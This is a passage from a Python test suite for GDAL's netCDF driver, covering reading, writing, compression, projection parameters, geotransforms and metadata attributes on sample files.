drv.Delete(ofile)
print('testCreateCopy() for file %s has reached timeout limit of %d seconds' % (ofile, timeout))
pytest.fail()
###############################################################################
# check support for DEFLATE compression, requires HDF5 and zlib
def netcdf_test_deflate(ifile, checksum, zlevel=1, timeout=None):
try:
from multiprocessing import Process
Process.is_alive
except (ImportError, AttributeError):
pytest.skip('from multiprocessing import Process failed')
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
ofile1 = 'tmp/' + os.path.basename(ifile) + '-1.nc'
ofile1_opts = ['FORMAT=NC4C', 'COMPRESS=NONE']
ofile2 = 'tmp/' + os.path.basename(ifile) + '-2.nc'
ofile2_opts = ['FORMAT=NC4C', 'COMPRESS=DEFLATE', 'ZLEVEL=' + str(zlevel)]
assert os.path.exists(ifile), ('ifile %s does not exist' % ifile)
netcdf_test_copy_timeout(ifile, 1, checksum, ofile1, ofile1_opts, 'NETCDF', timeout)
netcdf_test_copy_timeout(ifile, 1, checksum, ofile2, ofile2_opts, 'NETCDF', timeout)
# make sure compressed file is smaller than uncompressed files
try:
size1 = os.path.getsize(ofile1)
size2 = os.path.getsize(ofile2)
except OSError:
pytest.fail('Error getting file sizes.')
assert size2 < size1, \
'Compressed file is not smaller than reference, check your netcdf-4, HDF5 and zlib installation'
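# netcdf_test_deflate() is exercised below by test_netcdf_20() with
# ('data/utm.tif', 50235) and by test_netcdf_21() with a large warped GeoTIFF.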
###############################################################################
# check support for reading attributes (single values and array values)
def netcdf_check_vars(ifile, vals_global=None, vals_band=None):
src_ds = gdal.Open(ifile)
assert src_ds is not None, ('could not open dataset ' + ifile)
metadata_global = src_ds.GetMetadata()
assert metadata_global is not None, ('could not get global metadata from ' + ifile)
missval = src_ds.GetRasterBand(1).GetNoDataValue()
assert missval == 1, ('got invalid nodata value %s for Band' % str(missval))
metadata_band = src_ds.GetRasterBand(1).GetMetadata()
assert metadata_band is not None, 'could not get Band metadata'
metadata = metadata_global
vals = vals_global
if vals is None:
vals = dict()
for k, v in vals.items():
assert k in metadata, ("missing metadata [%s]" % (str(k)))
# strip { and } as new driver uses these for array values
mk = metadata[k].lstrip('{ ').rstrip('} ')
assert mk == v, ("invalid value [%s] for metadata [%s]=[%s]"
% (str(mk), str(k), str(v)))
metadata = metadata_band
vals = vals_band
if vals is None:
vals = dict()
for k, v in vals.items():
assert k in metadata, ("missing metadata [%s]" % (str(k)))
# strip { and } as new driver uses these for array values
mk = metadata[k].lstrip('{ ').rstrip('} ')
assert mk == v, ("invalid value [%s] for metadata [%s]=[%s]"
% (str(mk), str(k), str(v)))
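# netcdf_check_vars() is exercised below, e.g. by test_netcdf_24() and
# test_netcdf_25() with data/nc_vars.nc and matching vals_global / vals_band dicts.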
###############################################################################
# Netcdf Tests
###############################################################################
###############################################################################
# Perform simple read test.
def test_netcdf_1():
if gdaltest.netcdf_drv is None:
pytest.skip()
tst = gdaltest.GDALTest('NetCDF', 'NETCDF:"data/bug636.nc":tas', 1, 31621,
filename_absolute=1)
# We don't want to gum up the test stream output with the
# 'Warning 1: No UNIDATA NC_GLOBAL:Conventions attribute' message.
gdal.PushErrorHandler('CPLQuietErrorHandler')
tst.testOpen()
gdal.PopErrorHandler()
###############################################################################
# Verify a simple createcopy operation. We can't do the trivial gdaltest
# operation because the new file will only be accessible via subdatasets.
def test_netcdf_2():
if gdaltest.netcdf_drv is None:
pytest.skip()
src_ds = gdal.Open('data/byte.tif')
gdaltest.netcdf_drv.CreateCopy('tmp/netcdf2.nc', src_ds)
tst = gdaltest.GDALTest('NetCDF', 'tmp/netcdf2.nc',
1, 4672,
filename_absolute=1)
wkt = """PROJCS["NAD27 / UTM zone 11N",
GEOGCS["NAD27",
DATUM["North_American_Datum_1927",
SPHEROID["Clarke 1866",6378206.4,294.9786982139006,
AUTHORITY["EPSG","7008"]],
AUTHORITY["EPSG","6267"]],
PRIMEM["Greenwich",0],
UNIT["degree",0.0174532925199433],
AUTHORITY["EPSG","4267"]],
PROJECTION["Transverse_Mercator"],
PARAMETER["latitude_of_origin",0],
PARAMETER["central_meridian",-117],
PARAMETER["scale_factor",0.9996],
PARAMETER["false_easting",500000],
PARAMETER["false_northing",0],
UNIT["metre",1,
AUTHORITY["EPSG","9001"]],
AUTHORITY["EPSG","26711"]]"""
tst.testOpen(check_prj=wkt)
# Check that no nodata value is reported for a Byte dataset
ds = gdal.Open('tmp/netcdf2.nc')
assert ds.GetRasterBand(1).GetNoDataValue() is None
ds = None
# Test that in raster-only mode, update isn't supported (not sure what would be missing for that...)
with gdaltest.error_handler():
ds = gdal.Open('tmp/netcdf2.nc', gdal.GA_Update)
assert ds is None
gdaltest.clean_tmp()
###############################################################################
def test_netcdf_3():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/sombrero.grd')
bnd = ds.GetRasterBand(1)
minmax = bnd.ComputeRasterMinMax()
assert minmax[0] == pytest.approx((-0.675758), abs=0.000001) and minmax[1] == pytest.approx(1.0, abs=0.000001), \
'Wrong min or max.'
bnd = None
ds = None
###############################################################################
# In #2582, 5-dimensional files were causing problems. Verify use is ok.
def test_netcdf_4():
if gdaltest.netcdf_drv is None:
pytest.skip()
tst = gdaltest.GDALTest('NetCDF',
'NETCDF:data/foo_5dimensional.nc:temperature',
3, 1218, filename_absolute=1)
# We don't want to gum up the test stream output with the
# 'Warning 1: No UNIDATA NC_GLOBAL:Conventions attribute' message.
gdal.PushErrorHandler('CPLQuietErrorHandler')
# don't test for checksum (see bug #4284)
result = tst.testOpen(skip_checksum=True)
gdal.PopErrorHandler()
return result
###############################################################################
# In #2583, 5-dimensional files were having problems unrolling the highest
# dimension - check handling now on band 7.
def test_netcdf_5():
if gdaltest.netcdf_drv is None:
pytest.skip()
tst = gdaltest.GDALTest('NetCDF',
'NETCDF:data/foo_5dimensional.nc:temperature',
7, 1227, filename_absolute=1)
# We don't want to gum up the test stream output with the
# 'Warning 1: No UNIDATA NC_GLOBAL:Conventions attribute' message.
gdal.PushErrorHandler('CPLQuietErrorHandler')
# don't test for checksum (see bug #4284)
result = tst.testOpen(skip_checksum=True)
gdal.PopErrorHandler()
return result
###############################################################################
# ticket #3324 check spatial reference reading for cf-1.4 lambert conformal
# 1 standard parallel.
def test_netcdf_6():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/cf_lcc1sp.nc')
prj = ds.GetProjection()
sr = osr.SpatialReference()
sr.ImportFromWkt(prj)
lat_origin = sr.GetProjParm('latitude_of_origin')
assert lat_origin == 25, ('Latitude of origin does not match expected:\n%f'
% lat_origin)
ds = None
###############################################################################
# ticket #3324 check spatial reference reading for cf-1.4 lambert conformal
# 2 standard parallels.
def test_netcdf_7():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/cf_lcc2sp.nc')
prj = ds.GetProjection()
sr = osr.SpatialReference()
sr.ImportFromWkt(prj)
std_p1 = sr.GetProjParm('standard_parallel_1')
std_p2 = sr.GetProjParm('standard_parallel_2')
assert std_p1 == 33.0 and std_p2 == 45.0, \
('Standard Parallels do not match expected:\n%f,%f'
% (std_p1, std_p2))
ds = None
sr = None
###############################################################################
# check for cf convention read of albers equal area
# Previous version compared entire wkt, which varies slightly among driver versions
# now just look for PROJECTION=Albers_Conic_Equal_Area and some parameters
def test_netcdf_8():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/cf_aea2sp_invf.nc')
srs = osr.SpatialReference()
srs.ImportFromWkt(ds.GetProjection())
proj = srs.GetAttrValue('PROJECTION')
assert proj == 'Albers_Conic_Equal_Area', \
('Projection does not match expected : ' + proj)
param = srs.GetProjParm('latitude_of_center')
assert param == 37.5, ('Got wrong parameter value (%g)' % param)
param = srs.GetProjParm('longitude_of_center')
assert param == -96, ('Got wrong parameter value (%g)' % param)
ds = None
###############################################################################
# check to see if projected systems default to wgs84 if no spheroid def
def test_netcdf_9():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/cf_no_sphere.nc')
prj = ds.GetProjection()
sr = osr.SpatialReference()
sr.ImportFromWkt(prj)
spheroid = sr.GetAttrValue('SPHEROID')
assert spheroid == 'WGS 84', ('Incorrect spheroid read from file\n%s'
% (spheroid))
ds = None
sr = None
###############################################################################
# check if km pixel size makes it through to gt
def test_netcdf_10():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/cf_no_sphere.nc')
prj = ds.GetProjection()
gt = ds.GetGeoTransform()
gt1 = (-1897186.0290038721, 5079.3608398440065,
0.0, 2674684.0244560046,
0.0, -5079.4721679684635)
gt2 = (-1897.186029003872, 5.079360839844003,
0.0, 2674.6840244560044,
0.0, -5.079472167968456)
if gt != gt1:
sr = osr.SpatialReference()
sr.ImportFromWkt(prj)
        # new driver uses the UNIT attribute instead of scaling values
assert (sr.GetAttrValue("PROJCS|UNIT", 1) == "1000" and gt == gt2), \
('Incorrect geotransform, got ' + str(gt))
ds = None
###############################################################################
# check if ll gets caught in km pixel size check
def test_netcdf_11():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/cf_geog.nc')
gt = ds.GetGeoTransform()
assert gt == (-0.5, 1.0, 0.0, 10.5, 0.0, -1.0), 'Incorrect geotransform'
ds = None
###############################################################################
# check for scale/offset set/get.
def test_netcdf_12():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/scale_offset.nc')
scale = ds.GetRasterBand(1).GetScale()
offset = ds.GetRasterBand(1).GetOffset()
assert scale == 0.01 and offset == 1.5, \
('Incorrect scale(%f) or offset(%f)' % (scale, offset))
ds = None
###############################################################################
# check for scale/offset = None if no scale or offset is available
def test_netcdf_13():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/no_scale_offset.nc')
scale = ds.GetRasterBand(1).GetScale()
offset = ds.GetRasterBand(1).GetOffset()
assert scale is None and offset is None, 'Incorrect scale or offset'
ds = None
###############################################################################
# check for scale/offset for two variables
def test_netcdf_14():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('NETCDF:data/two_vars_scale_offset.nc:z')
scale = ds.GetRasterBand(1).GetScale()
offset = ds.GetRasterBand(1).GetOffset()
assert scale == 0.01 and offset == 1.5, \
('Incorrect scale(%f) or offset(%f)' % (scale, offset))
ds = None
ds = gdal.Open('NETCDF:data/two_vars_scale_offset.nc:q')
scale = ds.GetRasterBand(1).GetScale()
offset = ds.GetRasterBand(1).GetOffset()
assert scale == 0.1 and offset == 2.5, \
('Incorrect scale(%f) or offset(%f)' % (scale, offset))
###############################################################################
# check support for netcdf-2 (64 bit)
# This test fails in 1.8.1, because the driver does not support NC2 (bug #3890)
def test_netcdf_15():
if gdaltest.netcdf_drv is None:
pytest.skip()
if gdaltest.netcdf_drv_has_nc2:
ds = gdal.Open('data/trmm-nc2.nc')
assert ds is not None
ds = None
return
else:
pytest.skip()
###############################################################################
# check support for netcdf-4
def test_netcdf_16():
if gdaltest.netcdf_drv is None:
pytest.skip()
ifile = 'data/trmm-nc4.nc'
if gdaltest.netcdf_drv_has_nc4:
# test with Open()
ds = gdal.Open(ifile)
if ds is None:
pytest.fail('GDAL did not open file')
else:
name = ds.GetDriver().GetDescription()
ds = None
# return fail if did not open with the netCDF driver (i.e. HDF5Image)
assert name == 'netCDF', 'netcdf driver did not open file'
# test with Identify()
name = gdal.IdentifyDriver(ifile).GetDescription()
assert name == 'netCDF', 'netcdf driver did not identify file'
else:
pytest.skip()
###############################################################################
# check support for netcdf-4 - make sure hdf5 is not read by netcdf driver
def test_netcdf_17():
if gdaltest.netcdf_drv is None:
pytest.skip()
ifile = 'data/groups.h5'
# skip test if Hdf5 is not enabled
if gdal.GetDriverByName('HDF5') is None and \
gdal.GetDriverByName('HDF5Image') is None:
pytest.skip()
if gdaltest.netcdf_drv_has_nc4:
# test with Open()
ds = gdal.Open(ifile)
if ds is None:
pytest.fail('GDAL did not open hdf5 file')
else:
name = ds.GetDriver().GetDescription()
ds = None
# return fail if opened with the netCDF driver
assert name != 'netCDF', 'netcdf driver opened hdf5 file'
# test with Identify()
name = gdal.IdentifyDriver(ifile).GetDescription()
assert name != 'netCDF', 'netcdf driver was identified for hdf5 file'
else:
pytest.skip()
###############################################################################
# check support for netcdf-4 classic (NC4C)
def test_netcdf_18():
if gdaltest.netcdf_drv is None:
pytest.skip()
ifile = 'data/trmm-nc4c.nc'
if gdaltest.netcdf_drv_has_nc4:
# test with Open()
ds = gdal.Open(ifile)
if ds is None:
pytest.fail()
else:
name = ds.GetDriver().GetDescription()
ds = None
# return fail if did not open with the netCDF driver (i.e. HDF5Image)
assert name == 'netCDF'
# test with Identify()
name = gdal.IdentifyDriver(ifile).GetDescription()
assert name == 'netCDF'
else:
pytest.skip()
###############################################################################
# check support for reading with DEFLATE compression, requires NC4
def test_netcdf_19():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
tst = gdaltest.GDALTest('NetCDF', 'data/trmm-nc4z.nc', 1, 50235,
filename_absolute=1)
result = tst.testOpen(skip_checksum=True)
return result
###############################################################################
# check support for writing with DEFLATE compression, requires NC4
def test_netcdf_20():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
# simple test with tiny file
return netcdf_test_deflate('data/utm.tif', 50235)
###############################################################################
# check support for writing large file with DEFLATE compression
# if chunking is not defined properly within the netcdf driver, this test can take 1h
def test_netcdf_21():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
if not gdaltest.run_slow_tests():
pytest.skip()
bigfile = 'tmp/cache/utm-big.tif'
sys.stdout.write('.')
sys.stdout.flush()
# create cache dir if absent
if not os.path.exists('tmp/cache'):
os.mkdir('tmp/cache')
# look for large gtiff in cache
if not os.path.exists(bigfile):
# create large gtiff
if test_cli_utilities.get_gdalwarp_path() is None:
pytest.skip('gdalwarp not found')
warp_cmd = test_cli_utilities.get_gdalwarp_path() +\
' -q -overwrite -r bilinear -ts 7680 7680 -of gtiff ' +\
'data/utm.tif ' + bigfile
try:
(ret, err) = gdaltest.runexternal_out_and_err(warp_cmd)
except OSError:
pytest.fail('gdalwarp execution failed')
assert not (err != '' or ret != ''), \
('gdalwarp returned error\n' + str(ret) + ' ' + str(err))
# test compression of the file, with a conservative timeout of 60 seconds
return netcdf_test_deflate(bigfile, 26695, 6, 60)
###############################################################################
# check support for hdf4
def test_netcdf_22():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_hdf4:
pytest.skip()
ifile = 'data/hdifftst2.hdf'
# suppress warning
gdal.PushErrorHandler('CPLQuietErrorHandler')
ds = gdal.Open('NETCDF:' + ifile)
gdal.PopErrorHandler()
if ds is None:
pytest.fail('netcdf driver did not open hdf4 file')
else:
ds = None
###############################################################################
# check support for hdf4 - make sure hdf4 file is not read by netcdf driver
def test_netcdf_23():
# don't skip if netcdf is not enabled in GDAL
# if gdaltest.netcdf_drv is None:
# return 'skip'
# if not gdaltest.netcdf_drv_has_hdf4:
# return 'skip'
# skip test if Hdf4 is not enabled in GDAL
if gdal.GetDriverByName('HDF4') is None and \
gdal.GetDriverByName('HDF4Image') is None:
pytest.skip()
ifile = 'data/hdifftst2.hdf'
# test with Open()
ds = gdal.Open(ifile)
if ds is None:
pytest.fail('GDAL did not open hdf4 file')
else:
name = ds.GetDriver().GetDescription()
ds = None
# return fail if opened with the netCDF driver
assert name != 'netCDF', 'netcdf driver opened hdf4 file'
# test with Identify()
name = gdal.IdentifyDriver(ifile).GetDescription()
assert name != 'netCDF', 'netcdf driver was identified for hdf4 file'
###############################################################################
# check support for reading attributes (single values and array values)
def test_netcdf_24():
if gdaltest.netcdf_drv is None:
pytest.skip()
vals_global = {'NC_GLOBAL#test': 'testval',
'NC_GLOBAL#valid_range_i': '0,255',
'NC_GLOBAL#valid_min': '10.1',
'NC_GLOBAL#test_b': '1'}
vals_band = {'_Unsigned': 'true',
'valid_min': '10.1',
'valid_range_b': '1,10',
'valid_range_d': '0.1111112222222,255.555555555556',
'valid_range_f': '0.1111111,255.5556',
'valid_range_s': '0,255'}
return netcdf_check_vars('data/nc_vars.nc', vals_global, vals_band)
###############################################################################
# check support for NC4 reading attributes (single values and array values)
def netcdf_24_nc4():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
vals_global = {'NC_GLOBAL#test': 'testval',
'NC_GLOBAL#test_string': 'testval_string',
'NC_GLOBAL#valid_range_i': '0,255',
'NC_GLOBAL#valid_min': '10.1',
'NC_GLOBAL#test_b': '-100',
'NC_GLOBAL#test_ub': '200',
'NC_GLOBAL#test_s': '-16000',
'NC_GLOBAL#test_us': '32000',
'NC_GLOBAL#test_l': '-2000000000',
'NC_GLOBAL#test_ul': '4000000000'}
vals_band = {'test_string_arr': 'test,string,arr',
'valid_min': '10.1',
'valid_range_b': '1,10',
'valid_range_ub': '1,200',
'valid_range_s': '0,255',
'valid_range_us': '0,32000',
'valid_range_l': '0,255',
'valid_range_ul': '0,4000000000',
'valid_range_d': '0.1111112222222,255.555555555556',
'valid_range_f': '0.1111111,255.5556'}
return netcdf_check_vars('data/nc4_vars.nc', vals_global, vals_band)
###############################################################################
# check support for writing attributes (single values and array values)
def test_netcdf_25():
if gdaltest.netcdf_drv is None:
pytest.skip()
netcdf_test_copy('data/nc_vars.nc', 1, None, 'tmp/netcdf_25.nc')
vals_global = {'NC_GLOBAL#test': 'testval',
'NC_GLOBAL#valid_range_i': '0,255',
'NC_GLOBAL#valid_min': '10.1',
'NC_GLOBAL#test_b': '1'}
vals_band = {'_Unsigned': 'true',
'valid_min': '10.1',
'valid_range_b': '1,10',
'valid_range_d': '0.1111112222222,255.555555555556',
'valid_range_f': '0.1111111,255.5556',
'valid_range_s': '0,255'}
return netcdf_check_vars('tmp/netcdf_25.nc', vals_global, vals_band)
###############################################################################
# check support for NC4 writing attributes (single values and array values)
def netcdf_25_nc4():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
netcdf_test_copy('data/nc4_vars.nc', 1, None, 'tmp/netcdf_25_nc4.nc', ['FORMAT=NC4'])
vals_global = {'NC_GLOBAL#test': 'testval',
'NC_GLOBAL#test_string': 'testval_string',
'NC_GLOBAL#valid_range_i': '0,255',
'NC_GLOBAL#valid_min': '10.1',
'NC_GLOBAL#test_b': '-100',
'NC_GLOBAL#test_ub': '200',
'NC_GLOBAL#test_s': '-16000',
'NC_GLOBAL#test_us': '32000',
'NC_GLOBAL#test_l': '-2000000000',
'NC_GLOBAL#test_ul': '4000000000'}
vals_band = {'test_string_arr': 'test,string,arr',
'valid_min': '10.1',
'valid_range_b': '1,10',
'valid_range_ub': '1,200',
'valid_range_us': '0,32000',
'valid_range_l': '0,255',
'valid_range_ul': '0,4000000000',
'valid_range_d': '0.1111112222222,255.555555555556',
'valid_range_f': '0.1111111,255.5556',
'valid_range_s': '0,255'}
return netcdf_check_vars('tmp/netcdf_25_nc4.nc', vals_global, vals_band)
###############################################################################
# check support for WRITE_BOTTOMUP file creation option
# use a dummy file with no lon/lat info to force a different checksum
# depending on y-axis order
def test_netcdf_26():
if gdaltest.netcdf_drv is None:
pytest.skip()
# test default config
test = gdaltest.GDALTest('NETCDF', '../data/int16-nogeo.nc', 1, 4672)
gdal.PushErrorHandler('CPLQuietErrorHandler')
test.testCreateCopy(check_gt=0, check_srs=0, check_minmax=0)
gdal.PopErrorHandler()
# test WRITE_BOTTOMUP=NO
test = gdaltest.GDALTest('NETCDF', '../data/int16-nogeo.nc', 1, 4855,
options=['WRITE_BOTTOMUP=NO'])
test.testCreateCopy(check_gt=0, check_srs=0, check_minmax=0)
###############################################################################
# check support for GDAL_NETCDF_BOTTOMUP configuration option
def test_netcdf_27():
if gdaltest.netcdf_drv is None:
pytest.skip()
# test default config
test = gdaltest.GDALTest('NETCDF', '../data/int16-nogeo.nc', 1, 4672)
config_bak = gdal.GetConfigOption('GDAL_NETCDF_BOTTOMUP')
gdal.SetConfigOption('GDAL_NETCDF_BOTTOMUP', None)
test.testOpen()
gdal.SetConfigOption('GDAL_NETCDF_BOTTOMUP', config_bak)
# test GDAL_NETCDF_BOTTOMUP=NO
test = gdaltest.GDALTest('NETCDF', '../data/int16-nogeo.nc', 1, 4855)
config_bak = gdal.GetConfigOption('GDAL_NETCDF_BOTTOMUP')
gdal.SetConfigOption('GDAL_NETCDF_BOTTOMUP', 'NO')
test.testOpen()
gdal.SetConfigOption('GDAL_NETCDF_BOTTOMUP', config_bak)
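# The sketch below (not part of the original test suite) shows how an application
# would typically read a netCDF file with the y-axis kept in its on-disk order,
# i.e. with the driver's bottom-up flipping disabled. The file name is hypothetical
# and the underscore prefix keeps pytest from collecting the helper.
def _netcdf_bottomup_read_example(filename='example.nc'):
    previous = gdal.GetConfigOption('GDAL_NETCDF_BOTTOMUP')
    gdal.SetConfigOption('GDAL_NETCDF_BOTTOMUP', 'NO')
    try:
        ds = gdal.Open(filename)
        return ds.GetRasterBand(1).Checksum() if ds is not None else None
    finally:
        # restore the previous setting so the remaining tests are unaffected
        gdal.SetConfigOption('GDAL_NETCDF_BOTTOMUP', previous)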
###############################################################################
# check support for writing multi-dimensional files (helper function)
def netcdf_test_4dfile(ofile):
# test result file has 8 bands and 0 subdatasets (instead of 0 bands and 8 subdatasets)
ds = gdal.Open(ofile)
assert ds is not None, 'open of copy failed'
md = ds.GetMetadata('SUBDATASETS')
subds_count = 0
if md is not None:
subds_count = len(md) / 2
assert ds.RasterCount == 8 and subds_count == 0, \
('copy has %d bands (expected 8) and has %d subdatasets'
' (expected 0)' % (ds.RasterCount, subds_count))
ds = None
# get file header with ncdump (if available)
try:
(ret, err) = gdaltest.runexternal_out_and_err('ncdump -h')
except OSError:
print('NOTICE: ncdump not found')
return
if err is None or 'netcdf library version' not in err:
print('NOTICE: ncdump not found')
return
(ret, err) = gdaltest.runexternal_out_and_err('ncdump -h ' + ofile)
assert ret != '' and err == '', 'ncdump failed'
# simple dimension tests using ncdump output
err = ""
if 'int t(time, levelist, lat, lon) ;' not in ret:
err = err + 'variable (t) has wrong dimensions or is missing\n'
if 'levelist = 2 ;' not in ret:
err = err + 'levelist dimension is missing or incorrect\n'
if 'int levelist(levelist) ;' not in ret:
err = err + 'levelist variable is missing or incorrect\n'
if 'time = 4 ;' not in ret:
err = err + 'time dimension is missing or incorrect\n'
if 'double time(time) ;' not in ret:
err = err + 'time variable is missing or incorrect\n'
# uncomment this to get full header in output
# if err != '':
# err = err + ret
assert err == ''
###############################################################################
# check support for writing multi-dimensional files using CreateCopy()
def test_netcdf_28():
if gdaltest.netcdf_drv is None:
pytest.skip()
ifile = 'data/netcdf-4d.nc'
ofile = 'tmp/netcdf_28.nc'
# copy file
netcdf_test_copy(ifile, 0, None, ofile)
# test file
return netcdf_test_4dfile(ofile)
###############################################################################
# Check support for writing multi-dimensional files using gdalwarp.
# Requires metadata copy support in gdalwarp (see bug #3898).
# First create a vrt file using gdalwarp, then copy that file to netCDF.
# The workaround is (currently ??) necessary because the dimension rolling code
# lives in netCDFDataset::CreateCopy() and the required dimension metadata
# is not saved to netCDF when using gdalwarp directly (the driver does not write
# metadata to the netCDF file with SetMetadata() and SetMetadataItem()).
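# A roughly equivalent command-line sketch of this workaround (file names are
# hypothetical):
#   gdalwarp -q -overwrite -of VRT in_4d.nc tmp_4d.vrt
#   gdal_translate -of netCDF tmp_4d.vrt out_4d.nc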
def test_netcdf_29():
if gdaltest.netcdf_drv is None:
pytest.skip()
# create a vrt file using gdalwarp
if test_cli_utilities.get_gdalwarp_path() is None:
pytest.skip('gdalwarp not found')
ifile = 'data/netcdf-4d.nc'
ofile1 = 'tmp/netcdf_29.vrt'
ofile = 'tmp/netcdf_29.nc'
warp_cmd = '%s -q -overwrite -of vrt %s %s' %\
(test_cli_utilities.get_gdalwarp_path(), ifile, ofile1)
try:
(ret, err) = gdaltest.runexternal_out_and_err(warp_cmd)
except OSError:
pytest.fail('gdalwarp execution failed')
assert not (err != '' or ret != ''), \
('gdalwarp returned error\n' + str(ret) + ' ' + str(err))
# copy vrt to netcdf, with proper dimension rolling
netcdf_test_copy(ofile1, 0, None, ofile)
# test file
netcdf_test_4dfile(ofile)
###############################################################################
# check support for file with nan values (bug #4705)
def test_netcdf_30():
if gdaltest.netcdf_drv is None:
pytest.skip()
tst = gdaltest.GDALTest('NetCDF', 'trmm-nan.nc', 1, 62519)
# We don't want to gum up the test stream output with the
# 'Warning 1: No UNIDATA NC_GLOBAL:Conventions attribute' message.
gdal.PushErrorHandler('CPLQuietErrorHandler')
result = tst.testOpen()
gdal.PopErrorHandler()
return result
###############################################################################
# check that a 2x2 file has a proper geotransform
# a 1-pixel width or height is still unsupported because we can't get the pixel dimensions
def test_netcdf_31():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/trmm-2x2.nc')
ds.GetProjection()
gt = ds.GetGeoTransform()
gt1 = (-80.0, 0.25, 0.0, -19.5, 0.0, -0.25)
assert gt == gt1, ('Incorrect geotransform, got ' + str(gt))
ds = None
###############################################################################
# Test NC_UBYTE write/read - netcdf-4 (FORMAT=NC4) only (#5053)
def test_netcdf_32():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
ifile = 'data/byte.tif'
ofile = 'tmp/netcdf_32.nc'
# gdal.SetConfigOption('CPL_DEBUG', 'ON')
# test basic read/write
netcdf_test_copy(ifile, 1, 4672, ofile, ['FORMAT=NC4'])
netcdf_test_copy(ifile, 1, 4672, ofile, ['FORMAT=NC4C'])
###############################################################################
# Test NC_UBYTE metadata read - netcdf-4 (FORMAT=NC4) only (#5053)
def test_netcdf_33():
if gdaltest.netcdf_drv is None:
pytest.skip()
ifile = 'data/nc_vars.nc'
ofile = 'tmp/netcdf_33.nc'
netcdf_test_copy(ifile, 1, None, ofile, ['FORMAT=NC4'])
return netcdf_check_vars('tmp/netcdf_33.nc')
###############################################################################
# check support for reading a large file with chunking and DEFLATE compression
# if chunking is not supported by the netcdf driver, this test can take very long
def test_netcdf_34():
filename = 'utm-big-chunks.nc'
# this timeout is more than enough - on my system it takes <1s with the fix and about 25 seconds without
timeout = 5
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
if not gdaltest.run_slow_tests():
pytest.skip()
try:
from multiprocessing import Process
except ImportError:
pytest.skip('from multiprocessing import Process failed')
if not gdaltest.download_file('http://download.osgeo.org/gdal/data/netcdf/' + filename, filename):
pytest.skip()
sys.stdout.write('.')
sys.stdout.flush()
tst = gdaltest.GDALTest('NetCDF', '../tmp/cache/' + filename, 1, 31621)
# tst.testOpen()
gdal.PushErrorHandler('CPLQuietErrorHandler')
proc = Process(target=tst.testOpen)
proc.start()
proc.join(timeout)
gdal.PopErrorHandler()
# if proc is alive after timeout we must terminate it, and return fail
# valgrind detects memory leaks when this occurs (although it should never happen)
if proc.is_alive():
proc.terminate()
pytest.fail('testOpen() for file %s has reached timeout limit of %d seconds' % (filename, timeout))
###############################################################################
# test writing a long metadata item (> 8196 chars) (bug #5113)
def test_netcdf_35():
if gdaltest.netcdf_drv is None:
pytest.skip()
ifile = 'data/netcdf_fixes.nc'
ofile = 'tmp/netcdf_35.nc'
# copy file
netcdf_test_copy(ifile, 0, None, ofile)
# test long metadata is copied correctly
ds = gdal.Open(ofile)
assert ds is not None, 'open of copy failed'
md = ds.GetMetadata('')
assert 'U#bla' in md, 'U#bla metadata absent'
bla = md['U#bla']
assert len(bla) == 9591, \
('U#bla metadata is of length %d, expecting %d' % (len(bla), 9591))
assert bla[-4:] == '_bla', \
('U#bla metadata ends with [%s], expecting [%s]' % (bla[-4:], '_bla'))
###############################################################################
# test for correct geotransform (bug #5114)
def test_netcdf_36():
if gdaltest.netcdf_drv is None:
pytest.skip()
ifile = 'data/netcdf_fixes.nc'
ds = gdal.Open(ifile)
assert ds is not None, 'open failed'
gt = ds.GetGeoTransform()
assert gt is not None, 'got no GeoTransform'
gt_expected = (-3.498749944898817, 0.0025000042385525173, 0.0, 46.61749818589952, 0.0, -0.001666598849826389)
assert gt == gt_expected, \
('got GeoTransform %s, expected %s' % (str(gt), str(gt_expected)))
###############################################################################
# test for correct geotransform with longitude wrap
def test_netcdf_36_lonwrap():
if gdaltest.netcdf_drv is None:
pytest.skip()
ifile = 'data/nc_lonwrap.nc'
ds = gdal.Open(ifile)
assert ds is not None, 'open failed'
gt = ds.GetGeoTransform()
assert gt is not None, 'got no GeoTransform'
gt_expected = (-2.25, 2.5, 0.0, 16.25, 0.0, -2.5)
assert gt == gt_expected, \
('got GeoTransform %s, expected %s' % (str(gt), str(gt_expected)))
###############################################################################
# test for reading a Gaussian grid (bugs #4513 and #5118)
def test_netcdf_37():
if gdaltest.netcdf_drv is None:
pytest.skip()
ifile = 'data/reduce-cgcms.nc'
gdal.PushErrorHandler('CPLQuietErrorHandler')
ds = gdal.Open(ifile)
gdal.PopErrorHandler()
assert ds is not None, 'open failed'
gt = ds.GetGeoTransform()
assert gt is not None, 'got no GeoTransform'
gt_expected = (-1.875, 3.75, 0.0, 89.01354337620016, 0.0, -3.7088976406750063)
assert gt == gt_expected, \
('got GeoTransform %s, expected %s' % (str(gt), str(gt_expected)))
md = ds.GetMetadata('GEOLOCATION2')
assert md and 'Y_VALUES' in md, 'did not get 1D geolocation'
y_vals = md['Y_VALUES']
